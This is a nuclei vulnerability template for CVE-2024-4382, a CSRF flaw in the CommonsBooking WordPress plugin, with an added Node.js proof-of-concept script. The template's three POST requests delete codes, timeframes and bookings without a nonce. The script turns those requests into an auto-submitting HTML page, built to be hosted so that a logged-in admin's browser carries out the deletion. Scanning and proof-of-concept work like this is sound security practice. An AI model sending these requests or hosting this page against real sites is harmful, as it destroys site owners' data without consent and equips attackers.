CVE-2024-4382.yaml
id: CVE-2024-4382

info:
  name: CSRF Vulnerability in CB WordPress Plugin
  author: ProjectDiscoveryAI
  severity: medium
  description: The CB (legacy) WordPress plugin through 0.9.4.18 does not have CSRF checks in some bulk actions, which could allow attackers to make logged in admins perform unwanted actions, such as deleting codes, timeframes, and bookings.
  impact: |
    Allows attackers to perform unauthorized actions on behalf of authenticated users
  remediation: |
    Update CB WordPress Plugin to the latest version to mitigate CVE-2024-4382
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
    cvss-score: 6.5
    cve-id: CVE-2024-4382
    cwe-id: CWE-352
    epss-score: 0.00048
    epss-percentile: 0.19387
    cpe: cpe:2.3:a:wielebenwir:commonsbooking:*:*:*:*:*:wordpress:*:*
  metadata:
    vendor: wielebenwir
    product: commonsbooking
    framework: wordpress
    # WordPress installs plugins under /wp-content/plugins/ (plural)
    google-query: inurl:/wp-content/plugins/commonsbooking/

# All three requests replay a bulk "delete" action against an admin page without any
# _wpnonce field; only _wp_http_referer is sent, which WordPress uses for redirecting
# back after the action, not for request verification. The pages live under /wp-admin/,
# so the requests only do anything when nuclei is run with an authenticated admin
# session (e.g. -H "Cookie: wordpress_logged_in_<hash>=..."), and each one is
# destructive: it deletes the entry with id 1 on the target.
http:
  - method: POST
    path:
      - "{{BaseURL}}/wp-admin/admin.php?page=cb_codes"
    body: "_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dcb_codes&action=delete&filterby-Items=&paged=1&id%5B%5D=1&action2=delete"
    headers:
      Content-Type: "application/x-www-form-urlencoded"
    matchers:
      - type: word
        words:
          - "Item deleted successfully"
        part: body

  - method: POST
    path:
      - "{{BaseURL}}/wp-admin/admin.php?page=cb_timeframes"
    body: "_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dcb_timeframes&action=delete&filterby-Items=&paged=1&id%5B0%5D=1&action2=delete"
    headers:
      Content-Type: "application/x-www-form-urlencoded"
    matchers:
      - type: word
        words:
          - "Timeframe removed"
        part: body

  - method: POST
    path:
      - "{{BaseURL}}/wp-admin/admin.php?page=cb_bookings"
    body: "_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dcb_bookings&action=delete&filterby-Items=&paged=1&id%5B0%5D=1&action2=delete"
    headers:
      Content-Type: "application/x-www-form-urlencoded"
    matchers:
      - type: word
        words:
          - "Booking deleted"
        part: body
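The description says the bulk actions lack CSRF checks, and the three POST bodies above show what that means in practice: none of them carries a `_wpnonce` field, which is what WordPress' `check_admin_referer()` verifies; the `_wp_http_referer` field they do carry is only used to redirect back after the action. The Node.js script below is an added example, not part of the nuclei template or of the plugin: it parses the template's request bodies, reports whether a nonce is present, and renders the auto-submitting HTML form an attacker would host so that a logged-in admin's browser fires the delete with their session cookie. The target URL `https://wordpress.example` is a constructed placeholder.

```javascript
// Added example (not part of the template): turn one of the template's POST
// requests into a CSRF proof-of-concept page, and check a body for a WP nonce.
// Plain Node.js, no dependencies.

// Parse an application/x-www-form-urlencoded body into [name, value] pairs,
// preserving order and array-style keys such as "id[]" and "id[0]".
function parseFormBody(body) {
  const decode = (s) => decodeURIComponent(s.replace(/\+/g, " "));
  return body
    .split("&")
    .filter(Boolean)
    .map((pair) => {
      const i = pair.indexOf("=");
      const name = i === -1 ? pair : pair.slice(0, i);
      const value = i === -1 ? "" : pair.slice(i + 1);
      return [decode(name), decode(value)];
    });
}

// check_admin_referer() in WordPress validates the _wpnonce field.
// _wp_http_referer is a redirect-back hint, so its presence is not a defence.
function hasWpNonce(body) {
  return parseFormBody(body).some(([name]) => name === "_wpnonce");
}

function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Render an auto-submitting form. When a logged-in admin opens this page, the
// browser attaches the wordpress_logged_in_* cookie and the bulk delete runs.
function buildCsrfPage(baseUrl, page, body) {
  const action = `${baseUrl.replace(/\/$/, "")}/wp-admin/admin.php?page=${encodeURIComponent(page)}`;
  const inputs = parseFormBody(body)
    .map(([n, v]) => `  <input type="hidden" name="${escapeHtml(n)}" value="${escapeHtml(v)}">`)
    .join("\n");
  return [
    "<!doctype html><html><body>",
    `<form id="f" method="POST" action="${escapeHtml(action)}">`,
    inputs,
    "</form>",
    "<script>document.getElementById('f').submit();</script>",
    "</body></html>",
  ].join("\n");
}

// The three request bodies from the template, verbatim.
const TEMPLATE_BODIES = {
  cb_codes:
    "_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dcb_codes&action=delete&filterby-Items=&paged=1&id%5B%5D=1&action2=delete",
  cb_timeframes:
    "_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dcb_timeframes&action=delete&filterby-Items=&paged=1&id%5B0%5D=1&action2=delete",
  cb_bookings:
    "_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dcb_bookings&action=delete&filterby-Items=&paged=1&id%5B0%5D=1&action2=delete",
};

// Constructed placeholder target; substitute the host being tested.
const TARGET = "https://wordpress.example";

for (const [page, body] of Object.entries(TEMPLATE_BODIES)) {
  console.log(`${page}: _wpnonce present = ${hasWpNonce(body)}`);
}
console.log(buildCsrfPage(TARGET, "cb_codes", TEMPLATE_BODIES.cb_codes));
```

Saving the printed HTML and opening it while logged in as an administrator of a vulnerable install reproduces the deletion of code id 1, which is the same request the template's first step sends; a fixed version of the plugin rejects it because the nonce is missing.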